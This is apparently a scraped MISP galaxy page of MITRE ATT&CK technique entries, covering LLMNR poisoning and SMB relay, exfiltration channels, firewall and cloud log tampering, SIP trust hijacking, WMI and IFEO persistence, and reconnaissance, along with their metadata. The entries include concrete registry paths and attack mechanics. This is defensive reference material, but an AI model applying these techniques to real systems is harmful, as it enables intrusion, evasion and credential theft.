An adversary may stage software and tools for use during later stages of an attack. The software and tools may be placed on systems legitimately in use by the adversary or may be placed on previously compromised infrastructure. (Citation: APT1) (Citation: RedOctober)

Internal MISP references

UUID e8471f43-2742-4fd7-9af7-8ed1330ada37 which can be used as unique global reference for Upload, install, and configure software/tools - T1362 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1362
kill_chain ['pre-attack:stage-capabilities']

LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001

By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)

Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through Network Sniffing and crack the hashes offline through Brute Force to obtain the plaintext passwords.

In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. 

Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder.(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)

Internal MISP references

UUID 650c784b-7504-4df7-ab2c-4ea882384d1e which can be used as unique global reference for LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1557.001
kill_chain ['attack-Windows:credential-access', 'attack-Windows:collection']
mitre_data_sources ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Windows']
Related clusters

To see the related clusters, click here.

Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.

Internal MISP references

UUID fb8d023d-45be-47e9-bc51-f56bcae6435b which can be used as unique global reference for Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1048.003
kill_chain ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration', 'attack-Network:exfiltration']
mitre_data_sources ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
mitre_platforms ['Linux', 'macOS', 'Windows', 'Network']
Related clusters

To see the related clusters, click here.

Exfiltration Over Unencrypted Non-C2 Protocol - T1639.001

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). Adversaries may employ custom or publicly available encoding/compression algorithms (such as base64) or embed data within protocol headers and fields.

Internal MISP references

UUID 37047267-3e56-453c-833e-d92b68118120 which can be used as unique global reference for Exfiltration Over Unencrypted Non-C2 Protocol - T1639.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1639.001
kill_chain ['mobile-attack-Android:exfiltration', 'mobile-attack-iOS:exfiltration']
mitre_platforms ['Android', 'iOS']
Related clusters

To see the related clusters, click here.

Match Legitimate Name or Location - T1036.005

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.

Adversaries may also use the same icon of the file they are trying to mimic.

Internal MISP references

UUID 1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2 which can be used as unique global reference for Match Legitimate Name or Location - T1036.005 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1036.005
kill_chain ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Windows:defense-evasion', 'attack-Containers:defense-evasion']
mitre_data_sources ['File: File Metadata', 'Image: Image Metadata', 'Process: Process Creation', 'Process: Process Metadata']
mitre_platforms ['Linux', 'macOS', 'Windows', 'Containers']
Related clusters

To see the related clusters, click here.

Match Legitimate Name or Location - T1655.001

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by giving artifacts the name and icon of a legitimate, trusted application (i.e., Settings), or using a package name that matches legitimate, trusted applications (i.e., com.google.android.gm).

Adversaries may also use the same icon of the file or application they are trying to mimic.

Internal MISP references

UUID 114fed8b-7eed-4136-8b9c-411c5c7fff4b which can be used as unique global reference for Match Legitimate Name or Location - T1655.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1655.001
kill_chain ['mobile-attack-Android:defense-evasion', 'mobile-attack-iOS:defense-evasion']
mitre_platforms ['Android', 'iOS']
Related clusters

To see the related clusters, click here.

Disable or Modify System Firewall - T1562.004

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.

Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. Non-Standard Port).(Citation: change_rdp_port_conti)

Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various Remote Services may also indirectly modify firewall rules.

Internal MISP references

UUID 5372c5fe-f424-4def-bcd5-d3a8e770f07b which can be used as unique global reference for Disable or Modify System Firewall - T1562.004 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1562.004
kill_chain ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Windows:defense-evasion', 'attack-Network:defense-evasion']
mitre_data_sources ['Command: Command Execution', 'Firewall: Firewall Disable', 'Firewall: Firewall Rule Modification', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Linux', 'macOS', 'Windows', 'Network']
Related clusters

To see the related clusters, click here.

Disable or Modify Cloud Firewall - T1562.007

Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in Disable or Modify System Firewall.

Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)

Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.

Internal MISP references

UUID 77532a55-c283-4cd2-bc5d-2d0b65e9d88c which can be used as unique global reference for Disable or Modify Cloud Firewall - T1562.007 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1562.007
kill_chain ['attack-IaaS:defense-evasion']
mitre_data_sources ['Firewall: Firewall Disable', 'Firewall: Firewall Rule Modification']
mitre_platforms ['IaaS']
Related clusters

To see the related clusters, click here.

Disable or Modify Cloud Logs - T1562.008

An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.

For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the Set-MailboxAuditBypassAssociation cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)

Internal MISP references

UUID cacc40da-4c9e-462c-80d5-fd70a178b12d which can be used as unique global reference for Disable or Modify Cloud Logs - T1562.008 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1562.008
kill_chain ['attack-IaaS:defense-evasion', 'attack-SaaS:defense-evasion', 'attack-Google-Workspace:defense-evasion', 'attack-Azure-AD:defense-evasion', 'attack-Office-365:defense-evasion']
mitre_data_sources ['Cloud Service: Cloud Service Disable', 'Cloud Service: Cloud Service Modification', 'User Account: User Account Modification']
mitre_platforms ['IaaS', 'SaaS', 'Google Workspace', 'Azure AD', 'Office 365']
Related clusters

To see the related clusters, click here.

SIP and Trust Provider Hijacking - T1553.003

Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)

Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)

  • Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
  • Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[WOW6432Node]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
  • Modifying the DLL and Function Registry values in HKLM\SOFTWARE[WOW6432Node]Microsoft\Cryptography\Providers\Trust\FinalPolicy{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
  • Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)

Internal MISP references

UUID 543fceb5-cb92-40cb-aacf-6913d4db58bc which can be used as unique global reference for SIP and Trust Provider Hijacking - T1553.003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1553.003
kill_chain ['attack-Windows:defense-evasion']
mitre_data_sources ['File: File Modification', 'Module: Module Load', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Windows']
Related clusters

To see the related clusters, click here.

Windows Management Instrumentation Event Subscription - T1546.003

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015)

Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts – using mofcomp.exe –into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)

WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.

Internal MISP references

UUID 910906dd-8c0a-475a-9cc1-5e029e2fad58 which can be used as unique global reference for Windows Management Instrumentation Event Subscription - T1546.003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1546.003
kill_chain ['attack-Windows:privilege-escalation', 'attack-Windows:persistence']
mitre_data_sources ['Command: Command Execution', 'File: File Creation', 'Process: Process Creation', 'WMI: WMI Creation']
mitre_platforms ['Windows']
Related clusters

To see the related clusters, click here.

Exfiltration to Text Storage Sites - T1567.003

Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com, are commonly used by developers to share code and other information.

Text storage sites are often used to host malicious code for C2 communication (e.g., Stage Capabilities), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)

Note: This is distinct from Exfiltration to Code Repository, which highlight access to code repositories via APIs.

Internal MISP references

UUID ba04e672-da86-4e69-aa15-0eca5db25f43 which can be used as unique global reference for Exfiltration to Text Storage Sites - T1567.003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1567.003
kill_chain ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration']
mitre_data_sources ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
mitre_platforms ['Linux', 'macOS', 'Windows']
Related clusters

To see the related clusters, click here.

Executable Installer File Permissions Weakness - T1574.005

Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of DLL Search Order Hijacking.

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to Bypass User Account Control. Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

Internal MISP references

UUID 70d81154-b187-45f9-8ec5-295d01255979 which can be used as unique global reference for Executable Installer File Permissions Weakness - T1574.005 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1574.005
kill_chain ['attack-Windows:persistence', 'attack-Windows:privilege-escalation', 'attack-Windows:defense-evasion']
mitre_data_sources ['File: File Creation', 'File: File Modification', 'Module: Module Load', 'Process: Process Creation', 'Service: Service Metadata']
mitre_platforms ['Windows']
Related clusters

To see the related clusters, click here.

Path Interception by Unquoted Path - T1574.009

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.

Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)

This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.

Internal MISP references

UUID bf96a5a3-3bce-43b7-8597-88545984c07b which can be used as unique global reference for Path Interception by Unquoted Path - T1574.009 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1574.009
kill_chain ['attack-Windows:persistence', 'attack-Windows:privilege-escalation', 'attack-Windows:defense-evasion']
mitre_data_sources ['File: File Creation', 'File: File Modification', 'Process: Process Creation']
mitre_platforms ['Windows']
Related clusters

To see the related clusters, click here.

Image File Execution Options Injection - T1546.012

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)

Similar to Accessibility Features, on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with Remote Desktop Protocol will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Similar to Process Injection, these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.

Malware may also use IFEO to Impair Defenses by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)

Internal MISP references

UUID 6d4a7fb3-5a24-42be-ae61-6728a2b581f6 which can be used as unique global reference for Image File Execution Options Injection - T1546.012 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1546.012
kill_chain ['attack-Windows:privilege-escalation', 'attack-Windows:persistence']
mitre_data_sources ['Command: Command Execution', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Windows']
Related clusters

To see the related clusters, click here.

Friend/Follow/Connect to targets of interest - T1344

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Once a persona has been developed an adversary will use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)

Internal MISP references

UUID 103d72e6-7e0d-4b3a-9373-c38567305c33 which can be used as unique global reference for Friend/Follow/Connect to targets of interest - T1344 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1344
kill_chain ['pre-attack:persona-development']
Related clusters

To see the related clusters, click here.

Friend/Follow/Connect to targets of interest - T1364

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

A form of social engineering designed build trust and to lay the foundation for future interactions or attacks. (Citation: BlackHatRobinSage)

Internal MISP references

UUID eacd1efe-ee30-4b03-b58f-5b3b1adfe45d which can be used as unique global reference for Friend/Follow/Connect to targets of interest - T1364 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1364
kill_chain ['pre-attack:stage-capabilities']
Related clusters

To see the related clusters, click here.

Identify personnel with an authority/privilege - T1271

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Personnel internally to a company may have non-electronic specialized access, authorities, or privilege that make them an attractive target for an adversary. One example of this is an individual with financial authority to authorize large transactions. An adversary who compromises this individual might be able to subvert large dollar transfers. (Citation: RSA-APTRecon)

Internal MISP references

UUID 762771c2-3675-4535-88e9-b1f891758974 which can be used as unique global reference for Identify personnel with an authority/privilege - T1271 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1271
kill_chain ['pre-attack:people-information-gathering']

Receive KITs/KIQs and determine requirements - T1239

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Applicable agencies and/or personnel receive intelligence requirements and evaluate them to determine sub-requirements related to topics, questions, or requirements. For example, an adversary's nuclear energy requirements may be further divided into nuclear facilities versus nuclear warhead capabilities. (Citation: AnalystsAndPolicymaking)

Internal MISP references

UUID acfcbe7a-4dbc-4471-be2b-134faf479e3e which can be used as unique global reference for Receive KITs/KIQs and determine requirements - T1239 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1239
kill_chain ['pre-attack:priority-definition-direction']

Identify job postings and needs/gaps - T1248

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Job postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on technologies within the organization which could be valuable in attack or provide insight in to possible security weaknesses or limitations in detection or protection mechanisms. (Citation: JobPostingThreat)

Internal MISP references

UUID c721b235-679a-4d76-9ae9-e08921fccf84 which can be used as unique global reference for Identify job postings and needs/gaps - T1248 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1248
kill_chain ['pre-attack:technical-information-gathering']
Related clusters

To see the related clusters, click here.

Analyze hardware/software security defensive capabilities - T1294

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

An adversary can probe a victim's network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: OSFingerprinting2014)

Internal MISP references

UUID a1e8d61b-22e1-4983-8485-96420152ecd8 which can be used as unique global reference for Analyze hardware/software security defensive capabilities - T1294 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1294
kill_chain ['pre-attack:technical-weakness-identification']

Discover target logon/email address format - T1255

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Email addresses, logon credentials, and other forms of online identification typically share a common format. This makes guessing other credentials within the same domain easier. For example if a known email address is first.last@company.com it is likely that others in the company will have an email in the same format. (Citation: RSA-APTRecon)

Internal MISP references

UUID ef0f816a-d561-4953-84c6-2a2936c96957 which can be used as unique global reference for Discover target logon/email address format - T1255 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1255
kill_chain ['pre-attack:technical-information-gathering']

Identify job postings and needs/gaps - T1267

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Job postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on people within the organization which could be valuable in social engineering attempts. (Citation: JobPostingThreat)

Internal MISP references

UUID 0722cd65-0c83-4c89-9502-539198467ab1 which can be used as unique global reference for Identify job postings and needs/gaps - T1267 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1267
kill_chain ['pre-attack:people-information-gathering']
Related clusters

To see the related clusters, click here.

Identify job postings and needs/gaps - T1278

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Job postings, on either company sites, or in other forums, provide information on organizational structure, needs, and gaps in an organization. This may give an adversary an indication of weakness in an organization (such as under-resourced IT shop). Job postings can also provide information on an organizations structure which could be valuable in social engineering attempts. (Citation: JobPostingThreat) (Citation: RSA-APTRecon)

Internal MISP references

UUID 7718e92f-b011-4f88-b822-ae245a1de407 which can be used as unique global reference for Identify job postings and needs/gaps - T1278 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1278
kill_chain ['pre-attack:organizational-information-gathering']
Related clusters

To see the related clusters, click here.

Analyze organizational skillsets and deficiencies - T1300

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)

Internal MISP references

UUID 7baccb84-356c-4e89-8c5d-58e701f033fc which can be used as unique global reference for Analyze organizational skillsets and deficiencies - T1300 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1300
kill_chain ['pre-attack:organizational-weakness-identification']
Related clusters

To see the related clusters, click here.

Exfiltration Over Other Network Medium - T1011

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.

Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

Internal MISP references

UUID 51ea26b1-ff1e-4faa-b1a0-1114cd298c87 which can be used as unique global reference for Exfiltration Over Other Network Medium - T1011 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1011
kill_chain ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration']
mitre_data_sources ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
mitre_platforms ['Linux', 'macOS', 'Windows']

Network Traffic Capture or Redirection - T1410

An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.

A malicious app could register itself as a VPN client on Android or iOS to gain access to network packets. However, on both platforms, the user must grant consent to the app to act as a VPN client, and on iOS the app requires a special entitlement that must be granted by Apple.

Alternatively, if a malicious app is able to escalate operating system privileges, it may be able to use those privileges to gain access to network traffic.

An adversary could redirect network traffic to an adversary-controlled gateway by establishing a VPN connection or by manipulating the device's proxy settings. For example, Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by installing a malicious iOS Configuration Profile.

If applications encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.

Internal MISP references

UUID 3b0b604f-10db-41a0-b54c-493124d455b9 which can be used as unique global reference for Network Traffic Capture or Redirection - T1410 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1410
kill_chain ['mobile-attack-Android:collection', 'mobile-attack-iOS:collection', 'mobile-attack-Android:credential-access', 'mobile-attack-iOS:credential-access']
mitre_platforms ['Android', 'iOS']
Related clusters

To see the related clusters, click here.

Determine 3rd party infrastructure services - T1260

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

